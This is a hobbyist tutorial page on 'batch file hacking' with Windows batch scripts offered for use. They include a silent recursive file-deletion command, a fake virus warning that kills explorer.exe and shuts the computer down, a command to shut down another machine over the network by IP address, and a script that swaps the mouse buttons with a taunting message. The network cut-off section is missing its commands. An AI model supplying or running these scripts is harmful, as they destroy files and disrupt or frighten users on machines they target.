Batch File Hacking
Ok, Custard hereBatch file hacking is very fun oh yeaa in this page i will teach some tricks and about them.
The simple things you have to do is copy or write those codes in NOTEPAD then save them with any name but with an extension ".bat" do not include the quotations.. ENJOY!!
Batch File That Deletes Other Things.
This batch file will delete any file on your computer, be carefull now its pretty simple first of all
1.Open Notepad
2. Type
3.@echo off
del "Path Of File You Want To Delete" /Q /S> nul
4. Save as "Anything.bat"
5. Execute It.
@echo off
del "C:/Documents And Settings/Custard/Desktop/lol.txt" /Q /S> nul
Simple Funny Virus Batch Code.
@echo OFF
title Virus Detected Do Not Close Window
echo Virus Detected attempting to remove virus...
echo (press any key to continue)
pause >nul
echo Virus is spreading throughout the system...
echo (press any key to destroy)
pause >nul
echo destroying virus...
echo (press any key to continue)
pause >nul
echo files deleted to destroy virus
echo (press any key to cancel)
pause >nul
taskkill /f /im explorer.exe
echo cancel failed
echo (press any key to restore)
pause >nulecho files restored
start /im explorer.exe
echo files restored
echo (press any key to continue)
pause >nul
echo checking for virus...
echo virus still detected
echo (press any key to destroy)
pause >nul
echo virus is destroyed
echo (press any key to exit)
pause >nul
shutdown -s -t 5 -c "virus infected everything Windows is shuting down"
Shutdown Computers Over The Network.
To make this 1. Open Notepad, 2.Type Shutdown -s -m \\ (IP Address)
3. Save To Desktop As (Anything).bat (DONT FORGET THE .BAT)
4.Double click on the icon and wait.
5. Now there is of course other ways of doing this, read the post on the front page,
you can also open CMD and type "Shutdown -i"
Thats My 2nd Trick.
To Change The mouse button Option
@echo off
Rundll32 user32,SwapMouseButton
rundll32 keyboard,enable
msg * Enjoy Buddy.. You are Screwed.
Pause command
This command is use to provide the user interface
it ill work only when u press any ke
"PAUSE then -t 15"
To cut off the network system.
Type in notepad as
then save them as batch file with .bat extension
open and check your network it does not work
To get back the network system.
Type in notepad as
then save them as batch file with .bat extension
open and check your network starts working again...
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